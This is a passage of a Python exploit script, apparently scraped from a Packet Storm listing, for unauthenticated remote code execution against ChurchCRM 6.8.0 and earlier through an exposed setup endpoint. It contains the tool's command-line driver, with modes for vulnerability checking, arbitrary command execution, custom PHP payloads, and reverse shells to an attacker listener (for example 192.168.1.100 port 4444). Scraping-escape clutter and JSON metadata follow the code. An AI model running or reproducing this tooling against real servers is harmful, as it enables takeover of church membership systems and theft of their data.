ExploitResult(\\n success=False,\\n message=\\”Failed to inject backdoor\\”\\n )\\n \\n success = False\\n output = None\\n \\n if self.target_type == TargetType.LINUX_CMD_STAGER:\\n if self.custom_payload:\\n success, output = self.run_cmd_stager(self.custom_payload)\\n else:\\n \\n success, output = self.run_cmd_stager(‘id’)\\n if success and output:\\n self.logger.info(f\\”Command output: {output.strip()}\\”)\\n \\n elif self.target_type == TargetType.PHP_MEMORY:\\n success, output = self.run_php_memory()\\n \\n elif self.target_type == TargetType.PHP_FETCH:\\n success, output = self.run_php_fetch()\\n \\n self.cleanup()\\n \\n return ExploitResult(\\n success=success,\\n message=\\”Exploit completed successfully\\” if success else \\”Exploit failed\\”,\\n target=self.target,\\n output=output\\n )\\n \\n \\n def main():\\n \\”\\”\\”Main entry point\\”\\”\\”\\n parser = argparse.ArgumentParser(\\n description=’ChurchCRM Unauthenticated RCE Exploit by indoushka’,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=\\”\\”\\”\\n Examples:\\n # Check vulnerability\\n %(prog)s http:\/\/target.com\/churchcrm –check\\n \\n # Execute command\\n %(prog)s http:\/\/target.com –cmd \\”id\\”\\n \\n # Reverse shell (Linux)\\n %(prog)s http:\/\/target.com –reverse 192.168.1.100 4444\\n \\n # Reverse shell with PHP fetch method\\n %(prog)s http:\/\/target.com –type php-fetch –reverse 192.168.1.100 4444\\n \\n # Custom PHP payload\\n %(prog)s http:\/\/target.com –payload \\”\\u003c?php phpinfo(); ?\\u003e\\”\\n \\n # With proxy and debug\\n %(prog)s http:\/\/target.com –check –proxy http:\/\/127.0.0.1:8080 –debug\\n \\n Exit codes:\\n 0 – Not vulnerable \/ Success\\n 1 – Error \/ Unknown\\n 2 – Vulnerable\\n \\”\\”\\”\\n )\\n \\n parser.add_argument(‘target’, help=’Target URL (e.g., http:\/\/target.com\/churchcrm)’)\\n \\n parser.add_argument(‘–check’, action=’store_true’, help=’Check if target is vulnerable’)\\n parser.add_argument(‘–cmd’, metavar=’COMMAND’, help=’Execute command’)\\n parser.add_argument(‘–reverse’, nargs=2, metavar=(‘LHOST’, ‘LPORT’), \\n help=’Reverse shell (LHOST LPORT)’)\\n parser.add_argument(‘–payload’, metavar=’CODE’, help=’Custom PHP payload’)\\n parser.add_argument(‘–payload-file’, metavar=’FILE’, help=’PHP payload file’)\\n parser.add_argument(‘–type’, choices=[‘linux’, ‘php-memory’, ‘php-fetch’], \\n default=’linux’, help=’Target type (default: linux)’)\\n parser.add_argument(‘–proxy’, help=’HTTP proxy (e.g., http:\/\/127.0.0.1:8080)’)\\n parser.add_argument(‘–no-verify’, action=’store_true’, help=’Disable SSL verification’)\\n parser.add_argument(‘–debug’, action=’store_true’, help=’Enable debug output’)\\n parser.add_argument(‘–no-discover’, action=’store_true’, \\n help=’Disable automatic path discovery’)\\n \\n args = parser.parse_args()\\n \\n logger = setup_logger(args.debug)\\n \\n if not any([args.check, args.cmd, args.reverse, args.payload, args.payload_file]):\\n logger.error(\\”No action specified. Use –help for usage.\\”)\\n sys.exit(1)\\n \\n target_type_map = {\\n ‘linux’: TargetType.LINUX_CMD_STAGER,\\n ‘php-memory’: TargetType.PHP_MEMORY,\\n ‘php-fetch’: TargetType.PHP_FETCH\\n }\\n target_type = target_type_map[args.type]\\n \\n payload = None\\n if args.payload:\\n payload = args.payload\\n elif args.payload_file:\\n try:\\n with open(args.payload_file, ‘r’) as f:\\n payload = f.read()\\n except Exception as e:\\n logger.error(f\\”Failed to read payload file: {e}\\”)\\n sys.exit(1)\\n \\n try:\\n exploit = ChurchCRMExploit(\\n target_url=args.target,\\n logger=logger,\\n target_type=target_type,\\n lhost=args.reverse[0] if args.reverse else None,\\n lport=int(args.reverse[1]) if args.reverse else None,\\n payload=payload,\\n verify_ssl=not args.no_verify,\\n proxy=args.proxy,\\n auto_discover=not args.no_discover\\n )\\n except Exception as e:\\n logger.error(f\\”Failed to initialize exploit: {e}\\”)\\n if args.debug:\\n import traceback\\n traceback.print_exc()\\n sys.exit(1)\\n \\n try:\\n if args.check:\\n result = exploit.check()\\n if result[‘code’] == CheckCode.VULNERABLE:\\n logger.warning(f\\”Target is VULNERABLE! Version: {result.get(‘version’, ‘unknown’)}\\”)\\n sys.exit(2)\\n elif result[‘code’] == CheckCode.SAFE:\\n logger.info(\\”Target is NOT vulnerable\\”)\\n sys.exit(0)\\n else:\\n logger.warning(f\\”Unknown status: {result[‘message’]}\\”)\\n sys.exit(1)\\n \\n elif args.cmd:\\n logger.info(f\\”Executing command: {args.cmd}\\”)\\n \\n if exploit.target_type != TargetType.LINUX_CMD_STAGER:\\n logger.warning(f\\”Switching target type from {exploit.target_type.value} to linux_cmd_stager\\”)\\n exploit.target_type = TargetType.LINUX_CMD_STAGER\\n \\n result = exploit.exploit()\\n if result.success and result.output:\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”COMMAND OUTPUT:\\”)\\n print(\\”=\\”*60)\\n print(result.output)\\n print(\\”=\\”*60)\\n elif result.success:\\n print(\\”\\\\nCommand executed successfully (no output)\\”)\\n else:\\n logger.error(f\\”Command execution failed: {result.message}\\”)\\n sys.exit(1)\\n \\n elif args.reverse:\\n logger.info(f\\”Attempting reverse shell to {args.reverse[0]}:{args.reverse[1]}\\”)\\n \\n if args.type == ‘php-fetch’:\\n exploit.target_type = TargetType.PHP_FETCH\\n elif args.type == ‘php-memory’:\\n exploit.target_type = TargetType.PHP_MEMORY\\n else:\\n exploit.target_type = TargetType.LINUX_CMD_STAGER\\n \\n result = exploit.exploit()\\n \\n if result.success:\\n logger.info(\\”Reverse shell payload sent. Check your listener!\\”)\\n if result.output:\\n print(f\\”\\\\nOutput: {result.output}\\”)\\n else:\\n logger.error(f\\”Reverse shell failed: {result.message}\\”)\\n sys.exit(1)\\n \\n else:\\n result = exploit.exploit()\\n if result.success:\\n logger.info(\\”Exploit completed successfully!\\”)\\n if result.output:\\n print(f\\”\\\\nOutput: {result.output}\\”)\\n else:\\n logger.error(f\\”Exploit failed: {result.message}\\”)\\n sys.exit(1)\\n \\n except KeyboardInterrupt:\\n logger.info(\\”Interrupted by user\\”)\\n sys.exit(130)\\n except Exception as e:\\n logger.error(f\\”Unexpected error: {e}\\”)\\n if args.debug:\\n import traceback\\n traceback.print_exc()\\n sys.exit(1)\\n \\n \\n if __name__ == ‘__main__’:\\n main()\\n \\t\\t\\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215793″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215793\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-18T17:38:11″,”description”:”ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions. If the setup process remains accessible after deployment, it may allow…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41409","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n